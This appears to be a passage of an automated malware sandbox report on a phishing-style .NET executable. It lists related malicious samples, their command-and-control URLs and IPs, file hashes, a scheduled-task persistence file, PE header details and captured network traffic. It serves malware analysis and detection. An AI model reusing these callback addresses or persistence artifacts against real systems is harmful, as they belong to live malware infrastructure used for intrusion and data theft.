                                                                                              order no. 3643.exeGet hashmaliciousBrowse
                                                                                              • www.sphenecouture.com/0wdn/?QzuP3V=KfvDIX0H&Bl=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt
                                                                                              TN22020000560175.exeGet hashmaliciousBrowse
                                                                                              • www.sphenecouture.com/0wdn/?MR4ta=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt&Vnt4B=-Zd0izgp5Bkt8FY
                                                                                              51.83.43.2262143453.exeGet hashmaliciousBrowse
                                                                                              • www.trainingkanban.com/0wdn/?v2=Wh0xlrm&k8Phg=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+WHSrwtfokhi
                                                                                              194.59.164.34TN22020000560175.exeGet hashmaliciousBrowse
                                                                                              • www.gurumanindustries.com/0wdn/?MR4ta=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&Vnt4B=-Zd0izgp5Bkt8FY

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              www.dorteklarskov.comW08347.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.85
                                                                                              www.trainingkanban.com2143453.exeGet hashmaliciousBrowse
                                                                                              • 51.83.43.226
                                                                                              www.ficuswildlife.comW08347.exeGet hashmaliciousBrowse
                                                                                              • 52.58.78.16
                                                                                              www.buildermarketingprogram.comTN22020000560175.exeGet hashmaliciousBrowse
                                                                                              • 208.97.149.17
                                                                                              Quote.exeGet hashmaliciousBrowse
                                                                                              • 208.97.149.17
                                                                                              SHANDONG.exeGet hashmaliciousBrowse
                                                                                              • 208.97.149.17

                                                                                              ASN

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              GODADDY-AMSDE4pFzkB6ePK.exeGet hashmaliciousBrowse
                                                                                              • 160.153.128.38
                                                                                              NewOrder.xlsmGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              PO#652.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              Claim-1097837726-02162021.xlsGet hashmaliciousBrowse
                                                                                              • 160.153.137.40
                                                                                              Claim-509072992-02162021.xlsGet hashmaliciousBrowse
                                                                                              • 160.153.137.40
                                                                                              wfEePDdnmR.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              955037-012021-98_98795947.docGet hashmaliciousBrowse
                                                                                              • 160.153.137.14
                                                                                              po.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              Details!!.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              tXoqs48Ta9.rtfGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              q2o0a1neTm.exeGet hashmaliciousBrowse
                                                                                              • 160.153.136.3
                                                                                              LOOPIASEYOUR PRODUCT.docGet hashmaliciousBrowse
                                                                                              • 93.188.1.220
                                                                                              Quote QU038097.docGet hashmaliciousBrowse
                                                                                              • 93.188.2.51
                                                                                              IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                                                                              • 93.188.2.51
                                                                                              Invoice.docGet hashmaliciousBrowse
                                                                                              • 93.188.2.51
                                                                                              ChTY1xID7P.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.85
                                                                                              PO2364#FD21200.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.86
                                                                                              PO2836#NZ232.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.86
                                                                                              exhibition-template236-2021 Rfq.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.86
                                                                                              6OUYcd3GIs.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.86
                                                                                              W08347.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.85
                                                                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.86
                                                                                              SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.85
                                                                                              SKM_C3350191107102300.exeGet hashmaliciousBrowse
                                                                                              • 194.9.94.85
                                                                                              RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                              • 93.188.2.53
                                                                                              66484473877.xlsGet hashmaliciousBrowse
                                                                                              • 93.188.1.220
                                                                                              Shipment Details 01.exeGet hashmaliciousBrowse
                                                                                              • 93.188.3.14
                                                                                              Shipment Details.exeGet hashmaliciousBrowse
                                                                                              • 93.188.3.11
                                                                                              661976143337.xlsGet hashmaliciousBrowse
                                                                                              • 93.188.2.52
                                                                                              Swift Copy.exeGet hashmaliciousBrowse
                                                                                              • 93.188.3.14
                                                                                              661976143337.xlsGet hashmaliciousBrowse
                                                                                              • 93.188.2.52
                                                                                              KRYSTALGRtS9P6wPz9x.exeGet hashmaliciousBrowse
                                                                                              • 77.72.5.145
                                                                                              ransomware.exeGet hashmaliciousBrowse
                                                                                              • 77.72.5.145
                                                                                              ransomware.exeGet hashmaliciousBrowse
                                                                                              • 77.72.5.145
                                                                                              ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                              • 77.72.0.194
                                                                                              gc79a7rUNV.exeGet hashmaliciousBrowse
                                                                                              • 77.72.0.194
                                                                                              univarsolutions-01-02-21 Statement_607376Y2lhcmFuLmJyYW5pZmY=.htmGet hashmaliciousBrowse
                                                                                              • 185.53.59.20
                                                                                              15t12mg4Jb.exeGet hashmaliciousBrowse
                                                                                              • 77.72.0.126
                                                                                              8nU6IwdYTp.exeGet hashmaliciousBrowse
                                                                                              • 77.72.0.126
                                                                                              TN22020000560175.exeGet hashmaliciousBrowse
                                                                                              • 77.72.1.202
                                                                                              Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                                              • 77.72.0.166
                                                                                              Payment.xlsxGet hashmaliciousBrowse
                                                                                              • 77.72.0.166
                                                                                              Misc supplies.xlsxGet hashmaliciousBrowse
                                                                                              • 77.72.0.166
                                                                                              udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                                              • 77.72.1.27
                                                                                              uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                                                              • 185.199.220.27
                                                                                              kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                              • 185.53.56.90
                                                                                              9qB3tPamJa.exeGet hashmaliciousBrowse
                                                                                              • 185.199.220.27
                                                                                              https://justtradeservices.co.uk/Get hashmaliciousBrowse
                                                                                              • 77.72.4.13
                                                                                              Se adjunta un nuevo pedido.exeGet hashmaliciousBrowse
                                                                                              • 77.72.1.27
                                                                                              https://wallofsound.co.uk/wellaccessdocumentsecured/DriveGet hashmaliciousBrowse
                                                                                              • 185.53.59.148
                                                                                              #U260e#Ufe0f#Ufffd#Ufffdmineralresources.com.au.htmGet hashmaliciousBrowse
                                                                                              • 185.53.59.227

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation Reques.exe.log
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):1314
                                                                                              Entropy (8bit):5.350128552078965
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                              Malicious:true
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                              C:\Users\user\AppData\Local\Temp\tmp1923.tmp
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1644
                                                                                              Entropy (8bit):5.168396886992961
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1Ptn:cbhC7ZlNQF/rydbz9I3YODOLNdq3p
                                                                                              MD5:1BF9853001A0DBB1C19F15A6EDE92E65
                                                                                              SHA1:45EF1D7D64F2994F602A2C78AAD375C35315BD52
                                                                                              SHA-256:72F2B78F4787E9E88D4FF93F0585158549D64E309E310AE31A0C5DB83DC8680B
                                                                                              SHA-512:4FD771CB2496F7960DBA0A5EBE1986673259C9D16E6B02AEE34DCE769E9C71C65C0D04A24684388AE04BAF2077AB86087D6912627A5E61D4455BF88A6E39EF1D
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                                              C:\Users\user\AppData\Roaming\ftkqUsB.exe
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):549376
                                                                                              Entropy (8bit):7.243576126403181
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:5KLHi+NxBkVTGvbN/1qLs+I1Ul3vJPYcuxQULDGkUp1ea9IlL:5Ai+NcVTANqLsViExdy51Xo
                                                                                              MD5:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              SHA1:1E0608C292A70E30F75308255D6039A8CA373D8A
                                                                                              SHA-256:D96042B51F171F68A99D4568F311F267FE595DF0ADD3851E162CBCEE7F897EDB
                                                                                              SHA-512:BD8F7AA85DCF6FF042AA359637547ADF8CE1BE8C0BA535067E0FBFB85080CB03A249CCD176230C37F486AD486761EDB739DB705FA5B8F2CB859929C83D88ED8A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                              Reputation:low
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TL4`..............P..D..........rc... ........@.. ....................................@................................. c..O.................................................................................... ............... ..H............text...xC... ...D.................. ..`.rsrc................F..............@..@.reloc...............`..............@..B................Tc......H........x..HS..............0............................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                                                              C:\Users\user\AppData\Roaming\ftkqUsB.exe:Zone.Identifier
                                                                                              Process:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.243576126403181
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:Quotation Reques.exe
                                                                                              File size:549376
                                                                                              MD5:5a752fcd71acb65c618a829610b7b7e1
                                                                                              SHA1:1e0608c292a70e30f75308255d6039a8ca373d8a
                                                                                              SHA256:d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
                                                                                              SHA512:bd8f7aa85dcf6ff042aa359637547adf8ce1be8c0ba535067e0fbfb85080cb03a249ccd176230c37f486ad486761edb739db705fa5b8f2cb859929c83d88ed8a
                                                                                              SSDEEP:12288:5KLHi+NxBkVTGvbN/1qLs+I1Ul3vJPYcuxQULDGkUp1ea9IlL:5Ai+NcVTANqLsViExdy51Xo
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TL4`..............P..D..........rc... ........@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:0e4c714480900000

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x476372
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                              Time Stamp:0x60344C54 [Tue Feb 23 00:29:08 2021 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x763200x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x118a0.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x743780x74400False0.750888356855data7.41809908536IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x780000x118a00x11a00False0.205175088652data3.67376297045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_ICON0x781300x10828data
                                                                                              RT_GROUP_ICON0x889580x14data
                                                                                              RT_VERSION0x8896c0x324data
                                                                                              RT_MANIFEST0x88c900xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Version Infos

                                                                                              DescriptionData
                                                                                              Translation0x0000 0x04b0
                                                                                              LegalCopyrightCopyright 2018
                                                                                              Assembly Version1.0.0.0
                                                                                              InternalNameRIPEMD160.exe
                                                                                              FileVersion1.0.0.0
                                                                                              CompanyName
                                                                                              LegalTrademarks
                                                                                              Comments
                                                                                              ProductNameRegisterVB
                                                                                              ProductVersion1.0.0.0
                                                                                              FileDescriptionRegisterVB
                                                                                              OriginalFilenameRIPEMD160.exe

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Feb 23, 2021 09:39:19.175152063 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:19.309982061 CET8049727107.180.46.143192.168.2.5
                                                                                              Feb 23, 2021 09:39:19.310126066 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:19.310297966 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:19.446297884 CET8049727107.180.46.143192.168.2.5
                                                                                              Feb 23, 2021 09:39:19.802051067 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:19.976619005 CET8049727107.180.46.143192.168.2.5
                                                                                              Feb 23, 2021 09:39:20.749190092 CET8049727107.180.46.143192.168.2.5
                                                                                              Feb 23, 2021 09:39:20.749207973 CET8049727107.180.46.143192.168.2.5
                                                                                              Feb 23, 2021 09:39:20.749264002 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:20.749280930 CET4972780192.168.2.5107.180.46.143
                                                                                              Feb 23, 2021 09:39:30.122807980 CET4972880192.168.2.5138.197.103.178
                                                                                              Feb 23, 2021 09:39:30.248950958 CET8049728138.197.103.178192.168.2.5
                                                                                              Feb 23, 2021 09:39:30.249152899 CET4972880192.168.2.5138.197.103.178
                                                                                              Feb 23, 2021 09:39:30.249361038 CET4972880192.168.2.5138.197.103.178
                                                                                              Feb 23, 2021 09:39:30.375299931 CET8049728138.197.103.178192.168.2.5
                                                                                              Feb 23, 2021 09:39:30.375597954 CET8049728138.197.103.178192.168.2.5
                                                                                              Feb 23, 2021 09:39:30.375642061 CET8049728138.197.103.178192.168.2.5
                                                                                              Feb 23, 2021 09:39:30.375792980 CET4972880192.168.2.5138.197.103.178
                                                                                              Feb 23, 2021 09:39:30.375904083 CET4972880192.168.2.5138.197.103.178
                                                                                              Feb 23, 2021 09:39:30.501974106 CET8049728138.197.103.178192.168.2.5
                                                                                              Feb 23, 2021 09:39:35.747504950 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:35.799196005 CET804972977.72.1.202192.168.2.5
                                                                                              Feb 23, 2021 09:39:35.799319029 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:35.799494028 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:35.851037979 CET804972977.72.1.202192.168.2.5
                                                                                              Feb 23, 2021 09:39:36.306611061 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:36.399252892 CET804972977.72.1.202192.168.2.5
                                                                                              Feb 23, 2021 09:39:36.506441116 CET804972977.72.1.202192.168.2.5
                                                                                              Feb 23, 2021 09:39:36.506483078 CET804972977.72.1.202192.168.2.5
                                                                                              Feb 23, 2021 09:39:36.506664038 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:36.508017063 CET4972980192.168.2.577.72.1.202
                                                                                              Feb 23, 2021 09:39:46.899447918 CET4974180192.168.2.551.83.43.226
                                                                                              Feb 23, 2021 09:39:46.951154947 CET804974151.83.43.226192.168.2.5
                                                                                              Feb 23, 2021 09:39:46.953142881 CET4974180192.168.2.551.83.43.226
                                                                                              Feb 23, 2021 09:39:46.953430891 CET4974180192.168.2.551.83.43.226
                                                                                              Feb 23, 2021 09:39:47.003504038 CET804974151.83.43.226192.168.2.5
                                                                                              Feb 23, 2021 09:39:47.003861904 CET804974151.83.43.226192.168.2.5
                                                                                              Feb 23, 2021 09:39:47.003882885 CET804974151.83.43.226192.168.2.5
                                                                                              Feb 23, 2021 09:39:47.004033089 CET4974180192.168.2.551.83.43.226
                                                                                              Feb 23, 2021 09:39:47.004112959 CET4974180192.168.2.551.83.43.226
                                                                                              Feb 23, 2021 09:39:47.054157972 CET804974151.83.43.226192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.092580080 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.142450094 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.142563105 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.143121958 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.193479061 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203397036 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203428984 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203448057 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:39:53.203627110 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.203808069 CET4974280192.168.2.5160.153.133.87
                                                                                              Feb 23, 2021 09:39:53.253568888 CET8049742160.153.133.87192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.419117928 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.483418941 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.483541965 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.483678102 CET4974380192.168.2.5194.9.94.85
                                                                                              Feb 23, 2021 09:40:03.546354055 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546607018 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546665907 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546684027 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546703100 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546719074 CET8049743194.9.94.85192.168.2.5
                                                                                              Feb 23, 2021 09:40:03.546730995 CET8049743194.9.94.85192.168.2.5
